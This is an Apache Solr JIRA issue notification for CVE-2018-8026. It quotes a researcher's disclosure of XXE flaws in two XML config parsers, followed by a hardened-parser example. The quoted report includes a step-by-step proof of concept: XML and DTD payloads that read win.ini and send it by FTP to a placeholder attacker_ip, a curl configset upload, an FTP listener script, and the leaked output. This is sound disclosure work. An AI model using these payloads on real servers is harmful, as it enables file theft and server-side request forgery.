[ https://issues.apache.org/jira/browse/SOLR-12450?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16532934#comment-16532934 ]

Uwe Schindler commented on SOLR-12450:
--------------------------------------

Releases 7.4.0 and 6.6.5 of Apache Solr fix this issue.

To prevent this problem in the future, I will open a separate issue to actually
put DocumentBuilder & Co. on the forbidden APIs list. This involves API changes
around the Config class, so this was delayed to the next major release.

> CVE-2018-8026: More XXE vulns in code using DocumentBuilder
> -----------------------------------------------------------
>
>                 Key: SOLR-12450
>                 URL: https://issues.apache.org/jira/browse/SOLR-12450
>             Project: Solr
>          Issue Type: Bug
>      Security Level: Public(Default Security Level. Issues are Public) 
>          Components: security
>    Affects Versions: 6.6.4, 7.3.1
>            Reporter: Uwe Schindler
>            Assignee: Uwe Schindler
>            Priority: Major
>             Fix For: 6.6.5, 7.4
>
>         Attachments: SOLR-12450.patch, SOLR-12450.patch, SOLR-12450.patch, SOLR-12450.patch
>
>
> From: yuyang xiao <superxyy...@gmail.com>
> Date: Mon, Jun 4, 2018 at 10:22 AM
> Subject: XXE vulns in lucene-solr
> To: secur...@apache.org
> Title: XXE vulns in lucene-solr
> Author: XiaoXiong , superxyy...@gmail.com
> Date: 2018-06-04
> Download Site: http://www.apache.org/dyn/closer.lua/lucene/solr/7.3.1
> Vulnerability:
> Recently, I found two other XXE vulnerabilities: an unsecured
> DocumentBuilderFactory is being used to parse currency.xml and
> enumsConfig.xml.
> I think the problem is as serious as CVE-2018-8010; it can result in reading
> any file and in a server side request forgery attack. I think it is a dangerous
> vulnerability and that you should limit XML entity parsing.
>  
> The location of vulnerability one :
> https://github.com/apache/lucene-solr/blob/master/solr/core/src/java/org/apache/solr/schema/FileExchangeRateProvider.java
> {code:java}
> is = loader.openResource(currencyConfigFile);
> javax.xml.parsers.DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
> try {
>   dbf.setXIncludeAware(true);
>   dbf.setNamespaceAware(true);
> } catch (UnsupportedOperationException e) {
>   throw new SolrException(SolrException.ErrorCode.BAD_REQUEST, "XML parser doesn't support XInclude option", e);
> }
>
> Document doc = dbf.newDocumentBuilder().parse(is);
> {code}
>  
> The other XXE vulnerability:
> https://github.com/apache/lucene-solr/blob/master/solr/core/src/java/org/apache/solr/schema/AbstractEnumField.java
> {code:java}
> is = schema.getResourceLoader().openResource(enumsConfigFile);
> final DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
> final Document doc = dbf.newDocumentBuilder().parse(is);
> final XPathFactory xpathFactory = XPathFactory.newInstance();
> final XPath xpath = xpathFactory.newXPath();
> {code}
> The following is the vulnerability detail:
> Detail
> FileExchangeRateProvider Vulnerability
> environment:
> victim:
> Solr version: solr 7.3.1
> OS: windows 7
> java version "1.8.0_101"
> IP: victim_ip
> attacker:
> OS: kali
> IP: attacker_ip
> Step 1: Create a configset with three files in a directory called "test"
> schema.xml: import the currency handler
> {code:xml}
> <schema name="test" version="1.1">
>   <fieldType name="string" class="solr.StrField"/>
>   <fieldType name="currency" class="solr.CurrencyField" precisionStep="8" defaultCurrency="USD" currencyConfig="currency.xml" />
> </schema>
> {code}
> currency.xml: import the attack payload
> {code:xml}
> <?xml version="1.0"?>
> <!DOCTYPE ANY[<!ENTITY % remote SYSTEM "http://attacker_ip:9000/xxe.dtd"> %remote; ]>
> <currencyConfig version="1.0">
>   <rates>
>     <!-- Updated from http://www.exchangerate.com/ at 2011-09-27 -->
>     <rate from="USD" to="ARS" rate="4.333871" comment="ARGENTINA Peso" />
>     <rate from="USD" to="AUD" rate="1.025768" comment="AUSTRALIA Dollar" />
>     <rate from="USD" to="EUR" rate="0.743676" comment="European Euro" />
>     <rate from="USD" to="CAD" rate="1.030815" comment="CANADA Dollar" />
>     <!-- Cross-rates for some common currencies -->
>     <rate from="EUR" to="GBP" rate="0.869914" />
>     <rate from="EUR" to="NOK" rate="7.800095" />
>     <rate from="GBP" to="NOK" rate="8.966508" />
>     <!-- Asymmetrical rates -->
>     <rate from="EUR" to="USD" rate="0.5" />
>   </rates>
> </currencyConfig>
> {code}
> solrconfig.xml: normal config file
> {code:xml}
> <config>
>   <dataDir>${solr.data.dir:}</dataDir>
>   <directoryFactory name="DirectoryFactory" class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
>   <schemaFactory class="ClassicIndexSchemaFactory"/>
>   <luceneMatchVersion>7.3.1</luceneMatchVersion>
>   <updateHandler class="solr.DirectUpdateHandler2">
>     <commitWithin>
>       <softCommit>${solr.commitwithin.softcommit:true}</softCommit>
>     </commitWithin>
>   </updateHandler>
>   <requestHandler name="/select" class="solr.SearchHandler">
>     <lst name="defaults">
>       <str name="echoParams">explicit</str>
>       <str name="indent">true</str>
>       <str name="df">text</str>
>       <str name="password">passwdFile</str>
>     </lst>
>   </requestHandler>
> </config>
> {code}
> Step 2: Upload the test directory to Solr using the configset upload API:
> {noformat}
> (cd test && zip -r - *) | curl -X POST --header "Content-Type:application/octet-stream" --data-binary @- "http://victim_ip:8983/solr/admin/configs?action=UPLOAD&name=configset1"
> {noformat}
> Step 3: Prepare xxe.dtd so that the Solr server can read it:
> {noformat}
> python -m SimpleHTTPServer 9000
> {noformat}
> xxe.dtd:
> {code:xml}
> <!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
> <!ENTITY % int "<!ENTITY &#37; send SYSTEM 'ftp://user:12345@attacker_ip:2121/%file;/'>">
> %int;
> %send;
> {code}
> Step 4: Start the listening FTP server:
> {noformat}
> python ftpserver.py >> ./ftpserver.log 2>&1 &
> {noformat}
> ftpserver.py:
> {noformat}
> import os
> from pyftpdlib.authorizers import DummyAuthorizer
> from pyftpdlib.handlers import FTPHandler
> from pyftpdlib.servers import FTPServer
>
> def main():
>     # Instantiate a dummy authorizer for managing 'virtual' users
>     authorizer = DummyAuthorizer()
>
>     # Define a new user having full r/w permissions and a read-only
>     # anonymous user
>     authorizer.add_user('user', '12345', '.', perm='elradfmwMT')
>     authorizer.add_anonymous(os.getcwd(), perm='elradfmwMT')
>
>     # Instantiate FTP handler class
>     handler = FTPHandler
>     handler.authorizer = authorizer
>
>     # Define a customized banner (string returned when client connects)
>     handler.banner = "pyftpdlib based ftpd ready."
>
>     # Instantiate FTP server class and listen on 0.0.0.0:2121
>     address = ('', 2121)
>     server = FTPServer(address, handler)
>
>     # set a limit for connections
>     server.max_cons = 256
>     server.max_cons_per_ip = 5
>
>     # start ftp server
>     server.serve_forever()
>
> if __name__ == '__main__':
>     main()
> {noformat}
> Step 5: Create a collection using this configset, and the file is revealed.
> Input the URL:
> http://victim_ip:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=configset1
> Read the error response:
> {noformat}
> {  "responseHeader":{    "status":0,    "QTime":32895},  "failure":{    
> "victim_ip:7574_solr":"org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException:Error
>  from server at http://victim_ip:7574/solr: Error CREATEing SolrCore 
> 'mybadcoll_shard1_replica_n1': Unable to create core 
> [mybadcoll_shard1_replica_n1] Caused by: CWD ; for 16-bit app 
> support\n[fonts]\n[extensions]\n[mci 
> extensions]\n[files]\n[Mail]\nMAPI=1\nCMCDLLNAME32=mapi32.dll\nCMC=1\nMAPIX=1\nMAPIXVER=1.0.0.1\nOLEMessaging=1\n[MCI
>  
> Extensions.BAK]\n3g2=MPEGVideo\n3gp=MPEGVideo\n3gp2=MPEGVideo\n3gpp=MPEGVideo\naac=MPEGVideo\nadt=MPEGVideo\nadts=MPEGVideo\nm2t=MPEGVideo\nm2ts=MPEGVideo\nm2v=MPEGVideo\nm4a=MPEGVideo\nm4v=MPEGVideo\nmod=MPEGVideo\nmov=MPEGVideo\nmp4=MPEGVideo\nmp4v=MPEGVideo\nmts=MPEGVideo\nts=MPEGVideo\ntts=MPEGVideo\n:550
>  File name too long.\n"}}
> {noformat}
> AbstractEnumField Vulnerability
> The process is the same as with FileExchangeRateProvider under certain
> circumstances.
> schema.xml:
> {code:xml}
> <schema name="test1" version="1.1">
>   <fieldType name="string" class="solr.StrField"/>
>   <fieldType name="priorityLevel" class="solr.EnumFieldType" docValues="true" enumsConfig="enumsConfig.xml" enumName="priority"/>
>   <fieldType name="riskLevel" class="solr.EnumFieldType" docValues="true" enumsConfig="enumsConfig.xml" enumName="risk"/>
> </schema>
> {code}
> enumsConfig.xml:
> {code:xml}
> <?xml version="1.0" ?>
> <!DOCTYPE ANY[<!ENTITY % remote SYSTEM "http://attacker_ip:9000/xxe.dtd"> %remote;]>
> <enumsConfig>
>   <enum name="priority">
>     <value>Not Available</value>
>     <value>Low</value>
>     <value>Medium</value>
>     <value>High</value>
>     <value>Urgent</value>
>   </enum>
>   <enum name="risk">
>     <value>Unknown</value>
>     <value>Very Low</value>
>     <value>Low</value>
>     <value>Medium</value>
>     <value>High</value>
>     <value>Critical</value>
>   </enum>
> </enumsConfig>
> {code}
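The defensive counterpart to the two snippets quoted above, added here as an illustration and not taken from the SOLR-12450 patch: a DocumentBuilderFactory configured so that a config file carrying a DOCTYPE (like the currency.xml in the report) is rejected before any external DTD or file entity can be resolved. The class name and the constructed sample document are assumptions; the host `dtd-host.invalid` is a placeholder that is never contacted.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

public class HardenedConfigParser {
    // Constructed sample (not from the report): a currency.xml whose DOCTYPE pulls in an external DTD.
    static final String UNTRUSTED_CURRENCY_XML =
        "<?xml version=\"1.0\"?>\n"
        + "<!DOCTYPE currencyConfig [<!ENTITY % remote SYSTEM \"http://dtd-host.invalid/x.dtd\"> %remote;]>\n"
        + "<currencyConfig version=\"1.0\"><rates>"
        + "<rate from=\"USD\" to=\"EUR\" rate=\"0.743676\"/></rates></currencyConfig>";

    // Hardened factory; the JDK's built-in Xerces supports every feature used here.
    // Disallowing the DOCTYPE stops both the external DTD fetch and the file-reading parameter entities it would declare.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);          // the vulnerable FileExchangeRateProvider code enabled XInclude
        dbf.setExpandEntityReferences(false);
        return dbf;
    }

    // Returns the parsed config, or null when the parser rejects the document.
    static Document parseConfig(String xml) {
        try {
            DocumentBuilder db = hardenedFactory().newDocumentBuilder();
            return db.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        } catch (SAXParseException e) {
            // Reached for the sample above: the message says the DOCTYPE is disallowed by the feature set
            System.err.println("rejected: " + e.getMessage());
            return null;
        } catch (Exception e) {
            throw new IllegalStateException("parser setup or I/O failure", e);
        }
    }

    public static void main(String[] args) {
        System.out.println(parseConfig(UNTRUSTED_CURRENCY_XML) == null ? "config rejected" : "config parsed");
    }
}
```

Running it prints "config rejected" and no network connection is attempted; a DOCTYPE-free currency.xml parses normally with the same factory.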



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
